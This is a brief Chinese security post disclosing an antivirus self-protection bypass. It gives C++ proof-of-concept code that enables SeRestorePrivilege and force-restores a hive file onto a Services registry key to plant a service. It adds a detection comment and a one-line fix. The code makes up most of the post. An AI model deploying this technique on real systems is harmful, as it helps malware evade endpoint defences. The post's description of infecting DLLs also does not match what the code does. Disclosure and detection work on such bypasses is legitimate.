一种绕过绝大多数杀毒软件的方法及修复
杀毒软件在主动防御时过于依赖 WFP，漏防了系统自身的文件，导致恶意程序可能通过感染系统 DLL 绕过主动防御执行任意操作。
DllHijack POC代码:
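// Enables one named privilege (here SE_RESTORE_NAME) on the current process token.
// The privilege must already be present in the token, i.e. the process has to be
// running as an elevated administrator; a standard user token cannot gain it here.
// AdjustTokenPrivileges reports TRUE even when nothing was actually assigned, so the
// result is confirmed with ERROR_NOT_ALL_ASSIGNED. Returns TRUE only when the
// privilege is enabled.
BOOL EnableDebugPriv(LPCTSTR lpName)
{
    BOOL bRet = FALSE;
    HANDLE hToken = NULL;
    TOKEN_PRIVILEGES tp;
    LUID luid;
    do
    {
        if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
            break;
        if (!LookupPrivilegeValue(NULL, lpName, &luid))
            break;
        tp.PrivilegeCount = 1;
        tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
        tp.Privileges[0].Luid = luid;
        if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL))
            break;
        // A TRUE return with ERROR_NOT_ALL_ASSIGNED means the token never held the privilege.
        bRet = (GetLastError() != ERROR_NOT_ALL_ASSIGNED);
    } while (FALSE);
    if (hToken != NULL)
        CloseHandle(hToken);
    return bRet;
}

// Loads a saved hive file over hKey\lpSubKey with REG_FORCE_RESTORE, creating the
// key when it does not exist. Needs SeRestorePrivilege, obtained via EnableDebugPriv.
// Detection note: SeRestorePrivilege being enabled followed by RegRestoreKey on a
// subkey of SYSTEM\CurrentControlSet\Services is the observable behaviour here;
// a bypass of WFP-based self-protection does not change that sequence.
// Returns TRUE when the restore succeeded (the original check was inverted and
// reported TRUE only on failure).
BOOL RestoreReg(HKEY hKey, LPCWSTR lpSubKey, TCHAR szFilePath[MAX_PATH])
{
    BOOL bRet = FALSE;
    HKEY hCur = NULL;
    do
    {
        if (!EnableDebugPriv(SE_RESTORE_NAME))
            break;
        // ulOptions is a DWORD flag set, so 0 rather than NULL.
        if (RegOpenKeyEx(hKey, lpSubKey, 0, KEY_ALL_ACCESS, &hCur) != ERROR_SUCCESS
            && RegCreateKey(hKey, lpSubKey, &hCur) != ERROR_SUCCESS)
            break;
        bRet = (RegRestoreKey(hCur, szFilePath, REG_FORCE_RESTORE) == ERROR_SUCCESS);
    } while (FALSE);
    if (hCur)
        RegCloseKey(hCur);
    return bRet;
}

// MFC application entry point of the POC. On startup it restores C:\poc.hiv onto
// HKLM\SYSTEM\CurrentControlSet\Services\poc; what that hive contains is not shown
// on this page. The result of RestoreReg is ignored, as in the original, so the
// process gives no indication of success or failure. Always returns TRUE.
BOOL CDllHijackApp::InitInstance()
{
    CWinApp::InitInstance();
    RestoreReg(HKEY_LOCAL_MACHINE, L"SYSTEM\\CurrentControlSet\\Services\\poc", L"C:\\poc.hiv");
    return TRUE;
}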
修复方案：辅助 WFP 防护，校验文件。